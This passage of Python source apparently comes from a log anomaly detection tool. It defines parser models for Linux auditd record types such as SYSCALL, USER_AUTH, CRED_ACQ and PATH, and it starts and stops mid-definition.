b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-" perms_alphabet = b"abcdefghijklmnopqrstuvwxyz," type_branches = { "ADD_GROUP": SequenceModelElement("addgroup", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", b" msg='op=adding group acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", b'"'), FixedDataModelElement("s7", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s8", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s9", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s10", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s11", res), pam_status_word_list, FixedDataModelElement("s12", b"'"), ]), "ADD_USER": SequenceModelElement("adduser", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedWordlistDataModelElement("s5", [b" msg='op=adding user id=", b" msg='op=adding home directory id="]), DecimalIntegerValueModelElement("newuserid"), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), 
WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b"'"), ]), "ANOM_ABEND": SequenceModelElement("anom_abend", [ FixedDataModelElement("s0", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s6", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s7", reason), ExecArgumentDataModelElement("reason"), FixedDataModelElement("s8", sig), DecimalIntegerValueModelElement("sig") ]), "ANOM_ACCESS_FS": AnyByteDataModelElement("anom_access_fs"), "ANOM_ADD_ACCT": AnyByteDataModelElement("anom_add_acct"), "ANOM_AMTU_FAIL": AnyByteDataModelElement("anom_amtu_fail"), "ANOM_CRYPTO_FAIL": AnyByteDataModelElement("anom_crypto_fail"), "ANOM_DEL_ACCT": AnyByteDataModelElement("anom_del_acct"), "ANOM_EXEC": SequenceModelElement("anom_exec", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' acct="'), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s8", addr1), 
DelimitedDataModelElement("addr", b","), FixedDataModelElement("s9", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "ANOM_LOGIN_ACCT": AnyByteDataModelElement("anom_login_acct"), "ANOM_LOGIN_FAILURES": AnyByteDataModelElement("anom_login_failures"), "ANOM_LOGIN_LOCATION": AnyByteDataModelElement("anom_login_location"), "ANOM_LOGIN_SESSIONS": AnyByteDataModelElement("anom_login_sessions"), "ANOM_LOGIN_TIME": AnyByteDataModelElement("anom_login_time"), "ANOM_MAX_DAC": AnyByteDataModelElement("anom_max_dac"), "ANOM_MAX_MAC": AnyByteDataModelElement("anom_max_mac"), "ANOM_MK_EXEC": AnyByteDataModelElement("anom_mk_exec"), "ANOM_MOD_ACCT": AnyByteDataModelElement("anom_mod_acct"), "ANOM_PROMISCUOUS": SequenceModelElement("anom_promiscuous", [ FixedDataModelElement("s0", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("s1", b" prom="), DecimalIntegerValueModelElement("prom"), FixedDataModelElement("s2", b" old_prom="), DecimalIntegerValueModelElement("old_prom"), FixedDataModelElement("s3", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s5", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s6", ses), DecimalIntegerValueModelElement("ses"), ]), "ANOM_RBAC_FAIL": AnyByteDataModelElement("anom_rbac_fail"), "ANOM_RBAC_INTEGRITY_FAIL": AnyByteDataModelElement("anom_rbac_integrity_fail"), "ANOM_ROOT_TRANS": AnyByteDataModelElement("anom_root_trans"), "AVC": AnyByteDataModelElement("avc"), "AVC_PATH": AnyByteDataModelElement("avc_path"), "BPRM_FCAPS": SequenceModelElement("bprmfcaps", [ FixedDataModelElement("s0", b" fver="), DecimalIntegerValueModelElement("fver"), FixedDataModelElement("s1", b" fp="), HexStringModelElement("fp"), FixedDataModelElement("s2", b" fi="), HexStringModelElement("fi"), FixedDataModelElement("s3", 
b" fe="), HexStringModelElement("fe"), FixedDataModelElement("s4", b" old_pp="), DelimitedDataModelElement("pp-old", b" "), FixedDataModelElement("s5", b" old_pi="), DelimitedDataModelElement("pi-old", b' '), FixedDataModelElement("s6", b" old_pe="), DelimitedDataModelElement("pe-old", b" "), FixedDataModelElement("s7", b" new_pp="), DelimitedDataModelElement("pp-new", b" "), FixedDataModelElement("s8", b" new_pi="), DelimitedDataModelElement("pi-new", b" "), FixedDataModelElement("s9", b" new_pe="), AnyByteDataModelElement("pe-new") ]), "CAPSET": AnyByteDataModelElement("capset"), "CHGRP_ID": AnyByteDataModelElement("chgrp_id"), "CHUSER_ID": AnyByteDataModelElement("chuser_id"), "CONFIG_CHANGE": SequenceModelElement("conf-change", [ FixedDataModelElement("s0", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s2", b' op="'), DelimitedDataModelElement("op", b'"'), FixedDataModelElement("s3", b'" path="'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("s4", b'" key='), DelimitedDataModelElement("key", b" "), FixedDataModelElement("s5", b' list='), DecimalIntegerValueModelElement("list"), FixedDataModelElement("s6", res), DecimalIntegerValueModelElement("result") ]), "CRED_ACQ": SequenceModelElement("credacq", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), 
FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_DISP": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_REFR": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="root" exe="/usr/sbin/sshd" hostname='), IpAddressDataModelElement("clientname"), FixedDataModelElement("s5", addr), IpAddressDataModelElement("clientip"), FixedDataModelElement("s6", terminal), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b"'"), ]), "CRYPTO_FAILURE_USER": AnyByteDataModelElement("crypto_failure_user"), "CRYPTO_KEY_USER": AnyByteDataModelElement("crypto_key_user"), "CRYPTO_LOGIN": AnyByteDataModelElement("crypto_login"), 
"CRYPTO_LOGOUT": AnyByteDataModelElement("crypto_logout"), "CRYPTO_PARAM_CHANGE_USER": AnyByteDataModelElement("crypto_param_change_user"), "CRYPTO_REPLAY_USER": AnyByteDataModelElement("crypto_replay_user"), "CRYPTO_SESSION": SequenceModelElement("crypto_session", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' direction='), DelimitedDataModelElement("direction", b' '), FixedDataModelElement("s6", b' cipher='), DelimitedDataModelElement("cipher", b' '), FixedDataModelElement("s7", b' ksize='), DecimalIntegerValueModelElement("ksize"), FixedDataModelElement("s8", b' rport='), DecimalIntegerValueModelElement("rport"), FixedDataModelElement("s9", b' laddr='), IpAddressDataModelElement("laddr"), FixedDataModelElement("s10", b' lport='), DecimalIntegerValueModelElement("lport"), FixedDataModelElement("s11", b' id='), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s12", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s13", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s14", addr1), DelimitedDataModelElement("addr", b","), FixedDataModelElement("s15", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s16", res), pam_status_word_list, FixedDataModelElement("s17", b")'") ]), "CRYPTO_TEST_USER": AnyByteDataModelElement("crypto_test_user"), "CWD": SequenceModelElement("cwd", [ FixedDataModelElement("s0", b" cwd="), ExecArgumentDataModelElement("cwd")]), "DAC_CHECK": AnyByteDataModelElement("dac_check"), "DAEMON_ABORT": SequenceModelElement("daemon_abort", [ FixedDataModelElement("s0", b" auditd error 
halt,"), FixedDataModelElement("s1", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s2", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s3", res), pam_status_word_list ]), "DAEMON_ACCEPT": AnyByteDataModelElement("daemon_accept"), "DAEMON_CLOSE": AnyByteDataModelElement("daemon_close"), "DAEMON_CONFIG": SequenceModelElement("daemon_config", [ FixedDataModelElement("s0", b" auditd error getting hup info - no change, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_END": SequenceModelElement("daemon_end", [ FixedDataModelElement("s0", b" auditd normal halt, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), OptionalMatchModelElement("optional_subj", DelimitedDataModelElement("subj", b" ")), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_RESUME": SequenceModelElement("daemon_resume", [ FixedDataModelElement("s0", b" auditd resuming logging, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_ROTATE": AnyByteDataModelElement("daemon_rotate"), "DAEMON_START": SequenceModelElement("daemon_start", [ FixedDataModelElement("s0", b" auditd start, ver="), DecimalFloatValueModelElement("ver"), FixedDataModelElement("s1", b" format="), DelimitedDataModelElement("format", b" "), FixedDataModelElement("s2", b" kernel="), DelimitedDataModelElement("kernel", b" "), 
FixedDataModelElement("s3", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s4", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s5", res), pam_status_word_list ]), "DEL_GROUP": AnyByteDataModelElement("del_group"), "DEL_USER": AnyByteDataModelElement("del_user"), "EOE": AnyByteDataModelElement("eoe"), "EXECVE": SequenceModelElement("execve", [ FixedDataModelElement("s0", b" argc="), DecimalIntegerValueModelElement("argc"), # We need a type branch here also, but there is no additional data in EOE records after Ubuntu Trusty any more. RepeatedElementDataModelElement("arg", SequenceModelElement("execarg", [ FixedDataModelElement("s0", b" a"), DecimalIntegerValueModelElement("argn"), FixedDataModelElement("s1", b"="), ExecArgumentDataModelElement("argval") ])) ]), "FD_PAIR": SequenceModelElement("fdpair", [ FixedDataModelElement("s0", b" fd0="), DecimalIntegerValueModelElement("fd0"), FixedDataModelElement("s1", b" fd1="), DecimalIntegerValueModelElement("fd1") ]), "FS_RELABEL": AnyByteDataModelElement("fs_relabel"), "GRP_AUTH": AnyByteDataModelElement("grp_auth"), "INTEGRITY_DATA": AnyByteDataModelElement("integrity_data"), "INTEGRITY_HASH": AnyByteDataModelElement("integrity_hash"), "INTEGRITY_METADATA": AnyByteDataModelElement("integrity_metadata"), "INTEGRITY_PCR": AnyByteDataModelElement("integrity_pcr"), "INTEGRITY_RULE": AnyByteDataModelElement("integrity_rule"), "INTEGRITY_STATUS": AnyByteDataModelElement("integrity_status"), "IPC": AnyByteDataModelElement("ipc"), "IPC_SET_PERM": AnyByteDataModelElement("ipc_set_perm"), "KERNEL": AnyByteDataModelElement("kernel"), "KERNEL_OTHER": AnyByteDataModelElement("kernel_other"), "LABEL_LEVEL_CHANGE": AnyByteDataModelElement("label_level_change"), "LABEL_OVERRIDE": AnyByteDataModelElement("label_override"), # This message differs on Ubuntu 32/64 bit variants. 
"LOGIN": SequenceModelElement("login", [ FixedDataModelElement("s0", b" login"), FixedDataModelElement("s1", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s2", uid), DecimalIntegerValueModelElement("uid"), FixedWordlistDataModelElement("s3", [b" old auid=", b" old-auid="]), DecimalIntegerValueModelElement("auid-old"), FixedWordlistDataModelElement("s4", [b" new auid=", auid]), DecimalIntegerValueModelElement("auid-new"), FixedWordlistDataModelElement("s5", [b" old ses=", b" old-ses="]), DecimalIntegerValueModelElement("ses-old"), FixedWordlistDataModelElement("s6", [b" new ses=", ses]), DecimalIntegerValueModelElement("ses-new"), OptionalMatchModelElement("optional_result", SequenceModelElement("result_seq", [ FixedDataModelElement("s7", res), DecimalIntegerValueModelElement("result") ])) ]), "MAC_CIPSOV4_ADD": AnyByteDataModelElement("mac_cipsov4_add"), "MAC_CIPSOV4_DEL": AnyByteDataModelElement("mac_cipsov4_del"), "MAC_CONFIG_CHANGE": AnyByteDataModelElement("mac_config_change"), "MAC_IPSEC_EVENT": AnyByteDataModelElement("mac_ipsec_event"), "MAC_MAP_ADD": AnyByteDataModelElement("mac_map_add"), "MAC_MAP_DEL": AnyByteDataModelElement("mac_map_del"), "MAC_POLICY_LOAD": AnyByteDataModelElement("mac_policy_load"), "MAC_STATUS": SequenceModelElement("mac_status", [ FixedDataModelElement("s0", b" enforcing="), DecimalIntegerValueModelElement("enforcing"), FixedDataModelElement("s1", b" old_enforcing="), DecimalIntegerValueModelElement("old_enforcing"), FixedDataModelElement("s2", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses") ]), "MAC_UNLBL_ALLOW": AnyByteDataModelElement("mac_unlbl_allow"), "MAC_UNLBL_STCADD": AnyByteDataModelElement("mac_unlbl_stcadd"), "MAC_UNLBL_STCDEL": AnyByteDataModelElement("mac_unlbl_stcdel"), "MMAP": AnyByteDataModelElement("mmap"), "MQ_GETSETATTR": AnyByteDataModelElement("mq_getsetattr"), "MQ_NOTIFY": AnyByteDataModelElement("mq_notify"), 
"MQ_OPEN": AnyByteDataModelElement("mq_open"), "MQ_SENDRECV": AnyByteDataModelElement("mq_sendrecv"), "NETFILTER_CFG": SequenceModelElement("netfilter_cfg", [ FixedDataModelElement("s0", b" table="), FixedWordlistDataModelElement("table", [b"filter", b"mangle", b"nat"]), FixedDataModelElement("s1", b" family="), DecimalIntegerValueModelElement("family"), FixedDataModelElement("s2", b" entries="), DecimalIntegerValueModelElement("entries") ]), "NETFILTER_PKT": SequenceModelElement("netfilter_pkt", [ FixedDataModelElement("s0", b" mark=0x"), HexStringModelElement("mark"), FixedDataModelElement("s1", b" saddr="), FirstMatchModelElement("saddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s2", b" daddr="), FirstMatchModelElement("daddr", [ IpAddressDataModelElement("ipv4"), IpAddressDataModelElement("ipv6", ipv6=True), ]), FixedDataModelElement("s3", b" proto="), DecimalIntegerValueModelElement("proto") ]), "OBJ_PID": SequenceModelElement("objpid", [ FixedDataModelElement("s0", b" opid="), DecimalIntegerValueModelElement("opid"), FixedDataModelElement("s1", b" oauid="), DecimalIntegerValueModelElement("oauid", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s2", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s3", b" oses="), DecimalIntegerValueModelElement("oses", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s4", b" obj="), DelimitedDataModelElement("obj", b" "), FixedDataModelElement("s4", b" ocomm="), ExecArgumentDataModelElement("ocomm") ]), "PATH": SequenceModelElement("path", [ FixedDataModelElement("s0", b" item="), DecimalIntegerValueModelElement("item"), FixedDataModelElement("s1", b" name="), ExecArgumentDataModelElement("name"), FirstMatchModelElement("fsinfo", [ SequenceModelElement("inodeinfo", [ FixedDataModelElement("s0", b" inode="), 
DecimalIntegerValueModelElement("inode"), FixedDataModelElement("s1", dev), # A special major/minor device element could be better here. VariableByteDataModelElement("dev", b"0123456789abcdef:"), FixedDataModelElement("s2", b" mode="), # is octal DecimalIntegerValueModelElement("mode", value_pad_type=DecimalIntegerValueModelElement.PAD_TYPE_ZERO), FixedDataModelElement("s3", b" ouid="), DecimalIntegerValueModelElement("ouid"), FixedDataModelElement("s4", b" ogid="), DecimalIntegerValueModelElement("ogid"), FixedDataModelElement("s5", b" rdev="), # A special major/minor device element could be better here (see above). VariableByteDataModelElement("rdev", b"0123456789abcdef:"), FixedDataModelElement("s6", b" nametype=") ]), FixedDataModelElement("noinfo", b" nametype=")]), FixedWordlistDataModelElement("nametype", [b"CREATE", b"DELETE", b"NORMAL", b"PARENT", b"UNKNOWN"]) ]), "PROCTITLE": SequenceModelElement("proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle")]), "RESP_ACCT_LOCK": AnyByteDataModelElement("resp_acct_lock"), "RESP_ACCT_LOCK_TIMED": AnyByteDataModelElement("resp_acct_lock_timed"), "RESP_ACCT_REMOTE": AnyByteDataModelElement("resp_acct_remote"), "RESP_ACCT_UNLOCK_TIMED": AnyByteDataModelElement("resp_acct_unlock_timed"), "RESP_ALERT": AnyByteDataModelElement("resp_alert"), "RESP_ANOMALY": AnyByteDataModelElement("resp_anomaly"), "RESP_EXEC": AnyByteDataModelElement("resp_exec"), "RESP_HALT": AnyByteDataModelElement("resp_halt"), "RESP_KILL_PROC": AnyByteDataModelElement("resp_kill_proc"), "RESP_SEBOOL": AnyByteDataModelElement("resp_sebool"), "RESP_SINGLE": AnyByteDataModelElement("resp_single"), "RESP_TERM_ACCESS": AnyByteDataModelElement("resp_term_access"), "RESP_TERM_LOCK": AnyByteDataModelElement("resp_term_lock"), "ROLE_ASSIGN": AnyByteDataModelElement("role_assign"), "ROLE_MODIFY": AnyByteDataModelElement("role_modify"), "ROLE_REMOVE": AnyByteDataModelElement("role_remove"), "SELINUX_ERR": 
SequenceModelElement("service_err", [ FixedDataModelElement("s0", b" op="), DelimitedDataModelElement("op", b" "), FixedDataModelElement("s1", reason), DelimitedDataModelElement("reason", b" "), FixedDataModelElement("s2", b" scontext="), DelimitedDataModelElement("scontext", b" "), FixedDataModelElement("s3", b" tcontext="), DelimitedDataModelElement("tcontext", b" "), FixedDataModelElement("s4", b" tclass="), DelimitedDataModelElement("tclass", b" "), FixedDataModelElement("s5", b" perms="), VariableByteDataModelElement("perms", perms_alphabet) ]), "SERVICE_START": SequenceModelElement("service", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='"), OptionalMatchModelElement("optional_msg", DelimitedDataModelElement("msg", b" ")), FixedDataModelElement("s5", b' comm="'), DelimitedDataModelElement("comm", b'"'), FixedDataModelElement("s5", b'" exe="'), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "SOCKADDR": SequenceModelElement("sockaddr", [ FixedDataModelElement("s0", b" saddr="), HexStringModelElement("sockaddr", upper_case=True) ]), "SOCKETCALL": SequenceModelElement("socketcall", [ FixedDataModelElement("s0", b" nargs="), DecimalIntegerValueModelElement("nargs"), RepeatedElementDataModelElement("args", SequenceModelElement("arg", [ FixedDataModelElement("s1", b" a"), DecimalIntegerValueModelElement("arg_num"), FixedDataModelElement("s2", 
b"="), DecimalIntegerValueModelElement("arg"), ])) ]), "SYSCALL": SequenceModelElement("syscall", [ FixedDataModelElement("s0", b" arch="), HexStringModelElement("arch"), FixedDataModelElement("s1", b" syscall="), DecimalIntegerValueModelElement("syscall"), OptionalMatchModelElement( "personality", SequenceModelElement("pseq", [ FixedDataModelElement("s0", b" per="), DecimalIntegerValueModelElement("personality") ])), OptionalMatchModelElement("result", SequenceModelElement("rseq", [ FixedDataModelElement("s2", b" success="), FixedWordlistDataModelElement("succes", [b"no", b"yes"]), FixedDataModelElement("s3", b" exit="), DecimalIntegerValueModelElement("exit", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ])), FixedDataModelElement("s4", b" a0="), HexStringModelElement("arg0"), FixedDataModelElement("s5", b" a1="), HexStringModelElement("arg1"), FixedDataModelElement("s6", b" a2="), HexStringModelElement("arg2"), FixedDataModelElement("s7", b" a3="), HexStringModelElement("arg3"), FixedDataModelElement("s8", b" items="), DecimalIntegerValueModelElement("items"), FixedDataModelElement("s9", b" ppid="), DecimalIntegerValueModelElement("ppid"), FixedDataModelElement("s10", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s11", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s12", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s13", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s14", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("s15", b" suid="), DecimalIntegerValueModelElement("suid"), FixedDataModelElement("s16", b" fsuid="), DecimalIntegerValueModelElement("fsuid"), FixedDataModelElement("s17", b" egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("s18", b" sgid="), DecimalIntegerValueModelElement("sgid"), FixedDataModelElement("s19", b" fsgid="), DecimalIntegerValueModelElement("fsgid"), 
FixedDataModelElement("s20", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("s21", ses), DecimalIntegerValueModelElement("sesid"), FixedDataModelElement("s22", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s23", exe), DelimitedDataModelElement("executable", b'"'), FixedDataModelElement("s24", b'" key='), AnyByteDataModelElement("key") ]), "SYSTEM_BOOT": AnyByteDataModelElement("system_boot"), "SYSTEM_RUNLEVEL": AnyByteDataModelElement("system_runlevel"), "SYSTEM_SHUTDOWN": AnyByteDataModelElement("system_shutdown"), "TRUSTED_APP": AnyByteDataModelElement("trusted_app"), "TTY": AnyByteDataModelElement("tty"), # The UNKNOWN type is used then audispd does not know the type of the event, usually because the kernel is more recent than audispd, # thus emiting yet unknown event types. # * type=1327: procitle: see https://www.redhat.com/archives/linux-audit/2014-February/msg00047.html "UNKNOWN[1327]": SequenceModelElement("unknown-proctitle", [ FixedDataModelElement("s0", b" proctitle="), ExecArgumentDataModelElement("proctitle") ]), "USER_ACCT": SequenceModelElement("useracct", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:accounting acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), 
pam_status_word_list, FixedDataModelElement("s10", b")'") ]), "USER_AUTH": SequenceModelElement("userauth", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:authentication acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'") ]), "USER_AVC": AnyByteDataModelElement("user_avc"), "USER_CHAUTHTOK": AnyByteDataModelElement("user_chauthtok"), "USER_CMD": SequenceModelElement("user_cmd", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", b" msg='"), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s4", b' cmd="'), DelimitedDataModelElement("cmd", b'"'), FixedDataModelElement("s5", b"\" (terminal=pts/0"), FixedDataModelElement("s6", res), pam_status_word_list, FixedDataModelElement("s7", b")'"), ]), "USER_END": SequenceModelElement("userend", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), 
FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b' msg=\'PAM: session close acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", b'" :' + exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname1), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b")'"), ]), "USER_ERR": SequenceModelElement("usererr", [ FixedDataModelElement("space", b" "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), 